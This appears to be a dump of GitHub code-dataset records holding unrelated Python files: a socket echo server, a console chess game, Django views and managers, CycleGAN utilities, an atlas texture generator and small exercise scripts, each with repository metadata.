{}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(MonitoredServiceDTO, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, MonitoredServiceDTO):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, MonitoredServiceDTO):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"wavefrontHQ/python-client","sub_path":"wavefront_api_client/models/monitored_service_dto.py","file_name":"monitored_service_dto.py","file_ext":"py","file_size_in_byte":18814,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"21653915109","text":"import os\nimport select\nimport socket\nimport sys\nsys.path.insert(0, os.path.abspath(\n os.path.join(os.path.dirname(__file__), '../..')))\n\nfrom utils.bcolors import bcolors\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\n\n# create a socket object\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# get local machine name\nhost = socket.gethostname()\n\n# set a port number\nport = 9999\n\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver_socket.bind((host, port))\nserver_socket.listen(5)\n\n# Set up a list of sockets to monitor\nsockets_list = [server_socket]\n\n# Set up a dictionary to keep track of clients and their data\nclients = {}\n\nprint('\\n' + bcolors.OKGREEN + \"Server started.\" + bcolors.ENDC + '\\n')\n\nwhile True:\n # Monitor the sockets for incoming data\n read_sockets, _, _ = select.select(sockets_list, [], [])\n\n for sock in read_sockets:\n # Handle incoming connections\n 
if sock == server_socket:\n            client_socket, client_address = server_socket.accept()\n            sockets_list.append(client_socket)\n            clients[client_socket] = {'data': b''}\n            print(bcolors.OKBLUE +\n                  f\"New connection from {client_address[0]}:{client_address[1]}\" + bcolors.ENDC)\n\n        # Handle incoming data from clients\n        else:\n            try:\n                data = sock.recv(1024)\n                if data:\n                    clients[sock]['data'] += data\n                else:\n                    # No more data from the client, remove the socket\n                    print(\n                        bcolors.FAIL + f\"Connection closed by {sock.getpeername()[0]}\" + bcolors.ENDC)\n                    sockets_list.remove(sock)\n                    del clients[sock]\n            except Exception:\n                # Connection closed unexpectedly, remove the socket\n                print(\n                    bcolors.FAIL + f\"Connection closed by {sock.getpeername()[0]}\" + bcolors.ENDC)\n                sockets_list.remove(sock)\n                del clients[sock]\n\n    # Send data back to all connected clients\n    for sock in clients:\n        if clients[sock]['data']:\n            if clients[sock]['data'] == b'exit':\n                response = bcolors.FAIL+'Goodbye!'+bcolors.ENDC\n                sock.sendall(response.encode())\n                # Clear the buffer so the goodbye is sent only once\n                clients[sock]['data'] = b''\n                continue\n\n            response = bcolors.OKBLUE + f\"You sent: {clients[sock]['data'].decode()}\" + bcolors.ENDC\n            sock.sendall(response.encode())\n            clients[sock]['data'] = b''\n","repo_name":"Irwnda/network-programming","sub_path":"tugas1/server/server_select.py","file_name":"server_select.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"14001338610","text":"import chess as ch, ChessEngine as ce\n\nclass Main:\n\n    def __init__(self, board):\n        self.board = board\n        self.colour, self.maxDepth = None, -1\n        self.gamePlayer = 1\n\n    def printLegalMoves(self):\n        print(\"\\nLegal Move List : \" + str(self.board.legal_moves)[37:-1])\n\n    def resetGame(self):\n        # reset() is a method; without the parentheses the board was never cleared.\n        # Reset the defaults *before* restarting, so startGame() re-prompts cleanly.\n        self.board.reset()\n        self.colour, self.maxDepth = None, -1\n        self.startGame()\n\n    def gameOver(self):\n        print(self.board)\n        print(self.board.outcome())\n\n    def playMove(self, turnFirst, boardPrint):\n        if turnFirst == \"comp\":\n            self.playEngineMove(ch.WHITE)\n            print(self.board)\n            self.playEngineMove(ch.BLACK)\n\n\n        elif turnFirst:\n            if self.colour == \"w\":\n                self.playHumanMove()\n            \n            elif self.colour == \"b\":\n\n                self.colour = \"w\"\n                self.playEngineMove(ch.WHITE)\n            \n        elif not turnFirst:\n            if self.colour == \"w\":\n\n                self.colour = \"b\"\n                self.playEngineMove(ch.BLACK)\n            \n            elif self.colour == \"b\":\n                self.playHumanMove()\n            \n        if boardPrint:\n            print(self.board)\n\n    #Player's Turn\n    def playHumanMove(self):\n        try:\n            self.printLegalMoves()\n\n            play = input(\"Your move : \")\n            self.board.push_san(play)\n\n        except ValueError:\n            # Invalid or illegal move entered; ask again\n            self.playHumanMove()\n\n    #Engine's Turn\n    def playEngineMove(self, colour):\n        print(\"Processing...\")\n\n        engine = ce.Engine(self.board, self.maxDepth)\n\n        self.board.push(engine.getBestMove(colour))\n\n    #Run Game\n    def startGame(self):\n        # Get player information\n\n        while True:\n            try:\n                self.gamePlayer = int(input(\"Singleplayer (1), Computer vs Computer (0) : \"))\n                if self.gamePlayer == 0 or self.gamePlayer == 1:\n                    self.gamePlayer = bool(self.gamePlayer)\n                    break\n                \n                else:\n                    continue\n            \n            except ValueError:\n                continue\n\n        while not self.maxDepth > 1:\n            try:\n                if self.gamePlayer:\n                    while self.colour != \"w\" and self.colour != \"b\":\n                        self.colour = input(\"Play as (type 'w' or 'b'): \")\n\n                # Ask for the depth in both modes; otherwise computer vs computer never leaves this loop\n                self.maxDepth = int(input(\"Choose engine depth (recommended 4) : \")) # Note: Depth needs to be bumped by 1 to prevent errors\n\n            except ValueError:\n                print(\"ERROR: Invalid Depth, set value to 4\")\n                self.maxDepth = 4\n\n\n        
print(str(self.board)+\"\\n\")\n\n\n\n        while not self.board.is_checkmate():\n            if not self.gamePlayer:\n                self.playMove(\"comp\", True)\n\n            if self.gamePlayer:\n                self.playMove(True, True)\n                self.playMove(False, True)\n\n        self.gameOver()\n        self.resetGame()\n\n\n#create an instance and start a game\nnewBoard = ch.Board()\ngame = Main(newBoard)\nrunGame = game.startGame()","repo_name":"Flynn1460/V3","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"14209436946","text":"myList = [1, 2, 3, 1, 2, 5, 6, 7, 8]\r\ncleanlist = []\r\n\r\n[cleanlist.append(x) for x in myList if x not in cleanlist]\r\n\r\n#2nd option\r\ncleanlist2=[]\r\nfor x in myList:\r\n    if x not in cleanlist2:\r\n        cleanlist2.append(x)\r\nprint(cleanlist2)\r\n\r\n","repo_name":"keshavprashanth/Python_Learning","sub_path":"exercises/list_remove_duplicate.py","file_name":"list_remove_duplicate.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"27083516015","text":"# Given: a list containing page URLs\n# Required: write a function that fetches the source of each page in the list from the Web and saves it (the source) to disk.\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_html(urls):\n    for url in urls:\n        page = requests.get(url)\n        soup = BeautifulSoup(page.content, 'html.parser')\n        with open(f'document_{urls.index(url)}.html', 'w', encoding='utf-8') as file:\n            file.write(str(soup))\n\n\nget_html(['https://yandex.ru/',\n          'https://google.com/'])\n","repo_name":"dnantonov/tatneft","sub_path":"task2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"7250961091","text":"import re\n\npath = 'outputs/col1_col2.txt'\none_col_path = 'col1.txt'\ntwo_col_path = 'col2.txt'\nlines = []\none_col_lines = []\ntwo_col_lines = []\n\nwith open(one_col_path, 'r') as fp:\n    one_col_lines = fp.readlines()\n\nwith open(two_col_path, 'r') as fp:\n    two_col_lines = fp.readlines()\n\nfor index in range(len(one_col_lines)):\n    lines.append(\"{0}\\t{1}\".format(\n        re.sub('[\\r\\n]', '', one_col_lines[index]),\n        re.sub('[\\r\\n]', '', two_col_lines[index])\n    ))\n\nwith open(path, 'w') as fp:\n    fp.write('\\n'.join(lines))\n    fp.write('\\n')\n","repo_name":"aki202/nlp100","sub_path":"chapter2/013.py","file_name":"013.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"15803329324","text":"# -*- coding: utf-8 -*-\n\nfrom django.db.models import Manager\n\nfrom utils import parse_date_w3dtf\n\nclass CalendarManager(Manager):\n    def get_or_create(self, account, data):\n        uri = data.id.text\n        try:\n            result = self.get(uri = uri)\n        except self.model.DoesNotExist:\n            result = self.model(account = account)\n        result.uri = uri\n        for prop in ['summary', 'timezone', 'title', 'where']:\n            attr = getattr(data, prop)\n            if hasattr(attr, 'text'):\n                setattr(result, prop, attr.text or '')\n        for link in data.link:\n            if link.rel == 'alternate':\n                result.feed_uri = link.href\n        return result\n\nclass EventManager(Manager):\n    def get_or_create(self, calendar, data):\n        uri = data.id.text\n        try:\n            result = self.get(uri = uri)\n        except self.model.DoesNotExist:\n            result = self.model(calendar = calendar)\n        result.uri = uri\n        
result.title = data.title.text or ''\n result.content = data.content.text or ''\n try:\n result.where = data.where[0].value_string\n except IndexError:\n pass\n try:\n result.start_time = parse_date_w3dtf(data.when[0].start_time)\n result.end_time = parse_date_w3dtf(data.when[0].end_time)\n except:\n pass\n\n result.edit_uri = data.GetEditLink().href\n result.view_uri = data.GetHtmlLink().href\n return result","repo_name":"garethr/django-googlecalendar","sub_path":"googlecalendar/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"27479478765","text":"from django.db.models import Count, Q\n\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView, FormView\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\n\nfrom django.urls import reverse_lazy, reverse, path, include\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.contrib.auth.views import PasswordChangeView\nfrom django.core.exceptions import PermissionDenied\n\nfrom django.http import HttpResponseForbidden, HttpResponseRedirect\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\n\nfrom guardian.shortcuts import get_objects_for_user\nimport rules\n\nfrom extra_views import UpdateWithInlinesView, InlineFormSetFactory, ModelFormSetView\n\nfrom core.mixins import formviewMixins, viewMixins\nfrom formtools.wizard.views import SessionWizardView\n\nfrom fixture.models import Matches\nfrom users.models import PlayerProfile, PhoneNumber, Document, ClubProfile\nfrom league.models import Season\nfrom verification.models import Verification\n\nfrom . 
import forms\n\nLOGIN_URL = reverse_lazy('login')\n\nurlpatterns = []\n\n\nclass Home(LoginRequiredMixin, TemplateView):\n template_name = 'dashboard/home.html'\n login_url = LOGIN_URL\n\n def get_context_data(self, **kwargs):\n ctx = super().get_context_data(**kwargs)\n user = self.request.user\n club = user.get_club()\n if club:\n ctx['upcoming_matches'] = \\\n Matches.get_upcoming_matches_of_club(club)\n\n if user.is_player() and not club:\n profile = user.get_profile()\n if profile:\n ctx['club_offers'] = profile.get_all_offers()\n\n if user.is_club():\n if Season.objects.first().is_transfer_window_open():\n ctx['player_quota'] = club.player_quota_left()\n\n is_match_manager = rules.test_rule('manage_match', self.request.user)\n if is_match_manager:\n num_players = Count('players')\n num_noacc_players = Count('players', filter=Q(players__user=None))\n num_unverified_players = Count('players', filter=~Q(\n players__verification__status='VERIFIED'))\n clubInfo = ClubProfile.objects.annotate(\n num_players=num_players,\n num_noacc_players=num_noacc_players,\n num_unverified_players=num_unverified_players,\n )\n ctx['clubInfo'] = clubInfo\n\n return ctx\n\n\nurlpatterns += [path('home/', Home.as_view(), name='home'), ]\n\n\nclass Calendar(viewMixins, TemplateView):\n template_name = 'dashboard/calendar.html'\n login_url = LOGIN_URL\n\n def get_context_data(self, **kwargs):\n ctx = super().get_context_data(**kwargs)\n ctx['matches'] = Matches.get_upcoming_matches()\n ctx['done_matches'] = Matches.objects.filter(\n status=Matches.STATUS.done).order_by('-date')\n return ctx\n\n\nurlpatterns += [path('calendar/', Calendar.as_view(), name='calendar'), ]\n\n\nclass documentEditView(LoginRequiredMixin, formviewMixins, FormView):\n form_class = forms.imageEditForm\n template_name = 'dashboard/image_edit.html'\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n kwargs['instance'] = get_object_or_404(\n Document, pk=self.kwargs.get('pk', None)\n )\n return kwargs\n\n def form_valid(self, form):\n form.save()\n return super().form_valid(form)\n\n\nurlpatterns += [path('documentedit//',\n documentEditView.as_view(),\n name='documentedit'), ]\n\n\nclass documentUploadView(LoginRequiredMixin, formviewMixins, UpdateView):\n model = Document\n fields = ['image', ]\n template_name = 'dashboard/image_upload.html'\n\n def get_success_url(self):\n redirect_url = self.request.POST.get('redirect_url', None)\n if redirect_url:\n return redirect_url\n\n return reverse('dash:documentedit', kwargs={\n 'pk': self.kwargs.get('pk')})\n\n\nurlpatterns += [path('documentupload//',\n documentUploadView.as_view(),\n name='documentupload'), ]\n","repo_name":"prajeeshag/VFF","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21114849997","text":"import os\n\nFLAGS = _ = None\nDEBUG = False\n\n\ndef main():\n if DEBUG:\n print(f'Parsed arguments {FLAGS}')\n print(f'Unparsed arguments {_}')\n\n\nif __name__ == '__main__':\n root_path = os.path.abspath(__file__)\n root_dir = os.path.dirname(root_path)\n os.chdir(root_dir)\n\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--debug', action='store_true',\n help='The present debug message')\n\n FLAGS, _ = parser.parse_known_args()\n DEBUG = FLAGS.debug\n\n 
main()\n\n","repo_name":"munhyunsu/p2p-chain","sub_path":"main_clinet.py","file_name":"main_clinet.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9651665034","text":"# References:\n # https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/master/util/image_pool.py\n\nimport torch\nfrom torchvision.utils import make_grid\nfrom einops import rearrange\nimport numpy as np\nfrom PIL import Image\nfrom pathlib import Path\nfrom datetime import timedelta\nfrom time import time\nimport os\nimport random\nfrom collections import OrderedDict\n\n\ndef get_device():\n if torch.cuda.is_available():\n device = torch.device(\"cuda\")\n else:\n device = torch.device(\"cpu\")\n return device\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef denorm(tensor, mean, std):\n tensor *= torch.Tensor(std)[None, :, None, None]\n tensor += torch.Tensor(mean)[None, :, None, None]\n return tensor\n\n\ndef _batched_image_to_grid(image, n_cols):\n b, _, h, w = image.shape\n assert b % n_cols == 0,\\\n \"The batch size should be a multiple of `n_cols` argument\"\n pad = max(2, int(max(h, w) * 0.016))\n grid = make_grid(tensor=image, nrow=n_cols, normalize=False, padding=pad)\n grid = grid.clone().permute((1, 2, 0)).detach().cpu().numpy()\n grid *= 255\n grid = np.clip(a=grid, a_min=0, a_max=255).astype(\"uint8\")\n\n for k in range(n_cols + 1):\n grid[:, (pad + h) * k: (pad + h) * k + pad, :] = 255\n for k in range(b // n_cols + 1):\n grid[(pad + h) * k: (pad + h) * k + pad, :, :] = 255\n return grid\n\n\ndef image_to_grid(x, y, x_mean, x_std, y_mean, y_std, n_cols):\n x = x.detach().cpu()\n y = y.detach().cpu()\n\n x = denorm(x, mean=x_mean, std=x_std)\n y = denorm(y, mean=y_mean, std=y_std)\n\n images = [x, y]\n gen_image = rearrange(\n torch.cat(images, dim=0), pattern=\"(n m) c h w -> (m n) c h w\", n=len(images),\n )\n grid = _batched_image_to_grid(gen_image, n_cols=n_cols)\n return grid\n\n\ndef _to_pil(img):\n if not isinstance(img, Image.Image):\n img = Image.fromarray(img)\n return img\n\n\ndef save_image(image, path):\n path = Path(path)\n path.parent.mkdir(parents=True, exist_ok=True)\n _to_pil(image).save(str(path), quality=100)\n\n\ndef get_elapsed_time(start_time):\n return timedelta(seconds=round(time() - start_time))\n\n\ndef set_requires_grad(models, grad):\n for model in models:\n for p in model.parameters():\n p.requires_grad = grad\n\n\nclass ImageBuffer(object):\n# \"To reduce model oscillation we update the discriminators using a history of generated images rather than the\n# ones produced by the latest generators. 
We keep an image buffer that stores the 50 previously created images.\"\n    def __init__(self, buffer_size, stored_images=None):\n        self.buffer_size = buffer_size\n\n        # Avoid a shared mutable default argument ('stored_images=list()'),\n        # which would leak stored images across ImageBuffer instances.\n        self.stored_images = stored_images if stored_images is not None else []\n        self._cnt = len(self.stored_images)\n\n    def __call__(self, image):\n        images_to_return = list()\n        for unbatched_image in image:\n            if self._cnt < self.buffer_size:\n                self.stored_images.append(unbatched_image)\n                self._cnt += 1\n                images_to_return.append(unbatched_image)\n            else: # if the buffer is full\n                if random.random() > 0.5: # with 50% probability,\n                    idx = random.randrange(len(self.stored_images))\n                    images_to_return.append(self.stored_images[idx].clone()) # return one image from the buffer\n                    self.stored_images[idx] = unbatched_image # and store the new image in its place\n                else: # with the other 50% probability,\n                    images_to_return.append(unbatched_image) # return the input image unchanged\n        new_image = torch.stack(images_to_return, dim=0)\n        return new_image\n\n\ndef _modify_state_dict(state_dict, keyword=\"_orig_mod.\"):\n    new_state_dict = OrderedDict()\n    for old_key in list(state_dict.keys()):\n        if old_key and old_key.startswith(keyword):\n            new_key = old_key[len(keyword):]\n        else:\n            new_key = old_key\n        new_state_dict[new_key] = state_dict[old_key]\n    return new_state_dict\n","repo_name":"KimRass/CycleGAN","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"12525927343","text":"import math\nfrom typing import Dict, Literal\n\nfrom PIL import Image\nfrom pydantic import BaseModel\n\nfrom atlas_texture_creator.atlas_texture import AtlasTexture\n\n\nAtlasGridDirection = Literal[\"row\", \"column\"]\n\n\nclass AtlasGridItem(BaseModel):\n    column: int\n    row: int\n\n\nclass GenerateAtlasOptionsSize(BaseModel):\n    width: int\n    height: int\n\n\nclass GenerateAtlasOptions(BaseModel):\n    lock_size: GenerateAtlasOptionsSize | None\n\n\nclass GenerateAtlasCoordTexture(BaseModel):\n    x: int\n    y: int\n    width: int\n    height: int\n\n\nGenerateAtlasReturnType = Dict[str, GenerateAtlasCoordTexture]\n\n\nclass GenerateAtlasReturnTypeOut(BaseModel):\n    __root__: GenerateAtlasReturnType\n\n\nclass GenerateAtlasTextureCoords:\n    def __init__(self, init_data: GenerateAtlasReturnType = None):\n        if init_data is None:\n            init_data = {}\n\n        self.data: GenerateAtlasReturnType = init_data\n\n    def add_data(self, label: str, data: GenerateAtlasCoordTexture):\n        self.data[label] = data\n\n    def json(self):\n        return GenerateAtlasReturnTypeOut.parse_obj(self.data).json()\n\n\nclass AtlasCollectionTextureStore:\n    def __init__(self, grid_direction: AtlasGridDirection = \"row\"):\n        self._textures: list[list[AtlasTexture]] = []\n        self.grid = AtlasGrid(direction=grid_direction)\n\n    # 1 = self._textures[0][0] = [[1]] # new array\n    # 2 = self._textures[0][1] = [[1, 2]]\n    # 3 = self._textures[1][0] = [[1, 2], [3]] # new array\n    # 4 = self._textures[1][1] = [[1, 2], [3, 4]]\n    # 5 = self._textures[0][2] = [[1, 2, 5], [3, 4]]\n    # 6 = self._textures[2][0] = [[1, 2, 5], [3, 4], [6]] # new array\n    # 7 = self._textures[1][2] = [[1, 2, 5], [3, 4, 7], [6]]\n    # 8 = self._textures[2][1] = [[1, 2, 5], [3, 4, 7], [6, 8]]\n    # 9 = self._textures[2][2] = [[1, 2, 5], [3, 4, 7], [6, 8, 9]]\n    # 10 = self._textures[0][3] = [[1, 2, 5, 10], [3, 4, 7], [6, 8, 9]]\n    # 11 = self._textures[3][0] = [[1, 2, 5, 10], [3, 4, 7], [6, 8, 9], [11]] # new array\n    # 12 = self._textures[1][3] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9], [11]]\n    # 13 = self._textures[3][1] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9], [11, 
13]]\n # 14 = self._textures[2][3] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13]]\n # 15 = self._textures[3][2] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13, 15]]\n # 16 = self._textures[3][3] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13, 15, 16]]\n # 17 = self._textures[0][4] = [[1, 2, 5, 10, 17], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13, 15, 16]]\n # 18 = self._textures[4][0] = [[1, 2, 5, 10, 17], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13, 15, 16], [18]] # new array\n # self._textures[self.row_counter][self.column_counter]\n # arrays = row; numbers in array = column\n # column = 0 = new array\n\n def add(self, texture: AtlasTexture):\n id = len(self.grid)\n texture.id = id\n grid_item = self.grid.add()\n self._store_texture(texture, column=grid_item.column, row=grid_item.row)\n\n def replace(self, texture: AtlasTexture, row: int, column: int):\n self._textures[column][row] = texture\n\n def _store_texture(self, texture: AtlasTexture, row: int, column: int):\n texture.set_coord(column=column, row=row)\n\n if len(self._textures) == column:\n self._textures.append([])\n\n self._textures[column].append(texture)\n\n def get(self, row: int, column: int):\n return self._textures[column][row]\n\n def column(self, column: int):\n return self._textures[column]\n\n def row(self, row: int):\n row_list = []\n\n for column in self._textures:\n texture = column[row]\n row_list.append(texture)\n\n return row_list\n\n def __iter__(self):\n # COLUMNS\n for column in self._textures:\n for item in column:\n yield item\n\n # ROWS: # TODO: NOT WORKING\n # counter = 0\n # all_items_yield = False\n # while not all_items_yield:\n # for row in self._textures:\n # try:\n # yield row[counter]\n # except IndexError:\n # all_items_yield = True\n # break\n # counter += 1\n\n # square_number = math.ceil(math.sqrt(self._store_length))\n #\n # for column in range(square_number):\n # for row in range(square_number):\n # try:\n # yield self.get(row=row, column=column)\n # except IndexError:\n # break\n\n def __getitem__(self, item):\n return self._textures[item]\n\n def __len__(self):\n return len(self.grid)\n\n def _coord_flip(self):\n self._add_to_column = 0 if self._add_to_column == 1 else 1\n\n def _reset_add_to_column(self):\n self._add_to_column = 0\n\n\nclass AtlasCollection:\n def __init__(self, name: str):\n super().__init__()\n self.name = name\n self.texture_id = 1\n self.texture_store = AtlasCollectionTextureStore()\n\n def add_texture(self, texture_path: str, label: str) -> AtlasTexture:\n atlas_texture = AtlasTexture(self.texture_id, texture_path, label)\n self.texture_store.add(atlas_texture)\n return atlas_texture\n\n def load_texture(self, texture: AtlasTexture):\n self.texture_store.add(texture)\n\n def load_textures(self, textures: list[AtlasTexture]):\n for texture in textures:\n self.load_texture(texture)\n\n def get_texture(self, row: int, column: int) -> AtlasTexture:\n return self.texture_store.get(row=row, column=column)\n\n def textures(self) -> AtlasCollectionTextureStore:\n return self.texture_store\n\n def replace_texture(self, new_texture: AtlasTexture):\n column = new_texture.column\n row = new_texture.row\n\n self.texture_store.replace(new_texture, row=row, column=column)\n\n def generate_atlas(self, options: GenerateAtlasOptions = None) -> tuple[Image.Image, GenerateAtlasTextureCoords]:\n textures_coord = GenerateAtlasTextureCoords()\n atlas_width = 0\n atlas_height = 0\n square_number = math.ceil(math.sqrt(len(self.texture_store)))\n lock_texture_width = None\n 
lock_texture_height = None\n\n if options is not None and options.lock_size:\n lock_texture_width = options.lock_size.width\n lock_texture_height = options.lock_size.height\n\n atlas = Image.new(mode=\"RGBA\", size=(0, 0))\n\n for row in range(square_number):\n column_width = 0\n column_height = 0\n column_imgs = []\n\n for column in range(square_number):\n try:\n texture = self.texture_store.get(row=row, column=column)\n except IndexError:\n continue\n img = Image.open(texture.img_path)\n\n if lock_texture_width is not None or lock_texture_height is not None:\n new_img_width = lock_texture_width or img.width\n new_img_height = lock_texture_height or img.height\n img = img.resize((new_img_width, new_img_height))\n\n img_width, img_height = img.size\n\n if img_width > column_width:\n column_width = img_width\n column_height += img_height\n\n column_imgs.append({\n \"label\": texture.label,\n \"img\": img,\n })\n\n offset_x = atlas_width\n offset_y = 0\n\n atlas_width += column_width\n if column_height > atlas_height:\n atlas_height = column_height\n\n new_atlas = Image.new(\"RGBA\", size=(atlas_width, atlas_height))\n new_atlas.paste(atlas)\n atlas = new_atlas\n\n for img_obj in column_imgs:\n label = img_obj[\"label\"]\n img = img_obj[\"img\"]\n\n textures_coord.add_data(label, GenerateAtlasCoordTexture(\n x=offset_x,\n y=offset_y,\n width=img.width,\n height=img.height,\n ))\n\n atlas.paste(img, (offset_x, offset_y))\n offset_y += img.height\n\n return atlas, textures_coord\n\n def __len__(self):\n return len(self.texture_store)\n\n def __iter__(self):\n for texture in self.textures():\n yield texture\n\n\nclass AtlasGrid:\n def __init__(self, direction: AtlasGridDirection):\n self.direction = direction\n self.squares = 0\n self.column = 0\n self.row = 0\n self.offset = 0\n\n def add(self) -> AtlasGridItem:\n if self._calc_square():\n row = column = self.squares\n\n self._set_next_square()\n else:\n row = column = self.offset\n\n if self.direction == \"row\":\n if self.column == self.row:\n self.row += 1\n row = self.squares\n elif self.column < self.row:\n self.column += 1\n column = self.squares\n self.offset += 1\n elif self.direction == \"column\":\n if self.column == self.row:\n self.column += 1\n column = self.squares\n elif self.row < self.column:\n self.row += 1\n row = self.squares\n self.offset += 1\n\n item = AtlasGridItem(\n column=column,\n row=row,\n )\n\n return item\n\n def _calc_square(self) -> bool:\n l = len(self) + 1\n l_sqrt = math.sqrt(l)\n is_integer = l_sqrt.is_integer()\n\n return is_integer\n\n def _set_next_square(self):\n self.squares += 1\n self.offset = 0\n self.row = 0\n self.column = 0\n\n def __len__(self):\n length = (self.squares * self.squares) + self.row + self.column\n\n return length\n","repo_name":"pgmystery/atlas-texture-creator","sub_path":"atlas-texture-creator/atlas_texture_creator/atlas_collection.py","file_name":"atlas_collection.py","file_ext":"py","file_size_in_byte":10128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17752183091","text":"import numpy as np\nimport pandas as pd\nd = {'A': [1,2,np.nan], 'B': [5,np.nan,np.nan],'C': [1,2,3]}\ndf = pd.DataFrame(d)\n\n#dropna method\ndf.dropna(axis=1) #drop columns with null values\n\n#dropna with thresh \n#passing thresh value to determine which row to drop\n#i.e: thresh = 2 will see if a row has at least 2 non-NA values\ndf.dropna(thresh=2)\n\n#fill method (replace missing value)\ndf.fillna(value='FILL 
VALUE')\ndf['A'].fillna(value=df['A'].mean()) #fill na values in column A\n","repo_name":"hdoan0503/Data-Science","sub_path":"MissingData.py","file_name":"MissingData.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33389874","text":"# Import required modules\nimport logging, time\nfrom twisted.internet import defer\nfrom twisted.trial import unittest\nfrom mock import MagicMock\nfrom hwm.sessions import schedule, session\nfrom hwm.core.configuration import *\nfrom hwm.hardware.pipelines import pipeline, manager as pipeline_manager\nfrom hwm.hardware.devices import manager as device_manager\nfrom hwm.hardware.devices.drivers import driver\nfrom hwm.command import parser, command\nfrom hwm.command.handlers import system as command_handler\nfrom hwm.network.security import permissions\nfrom pkg_resources import Requirement, resource_filename\nfrom hwm.sessions.tests.utilities import *\n\nclass TestSession(unittest.TestCase):\n \"\"\" This test suite is used to test the functionality of the Session class, which is used to represent user hardware\n pipeline reservations.\n \"\"\"\n\n def setUp(self):\n # Set a local reference to Configuration (how other modules should typically access Config)\n self.config = Configuration\n self.config.verbose_startup = False\n \n # Set the source data directory\n self.source_data_directory = resource_filename(Requirement.parse(\"Mercury2HWM\"),\"hwm\")\n \n # Create a valid command parser and device manager for testing\n self.config.read_configuration(self.source_data_directory+'/hardware/devices/tests/data/devices_configuration_valid.yml')\n self.config.read_configuration(self.source_data_directory+'/hardware/pipelines/tests/data/pipeline_configuration_valid.yml')\n permission_manager = permissions.PermissionManager(self.source_data_directory+'/network/security/tests/data/test_permissions_valid.json', 3600)\n self.command_parser = parser.CommandParser([command_handler.SystemCommandHandler('system')], permission_manager)\n self.device_manager = device_manager.DeviceManager(self.command_parser)\n self.pipeline_manager = MagicMock()\n self.command_parser.pipeline_manager = self.pipeline_manager\n self.session_coordinator = MockSessionCoordinator(self.command_parser)\n \n # Disable logging for most 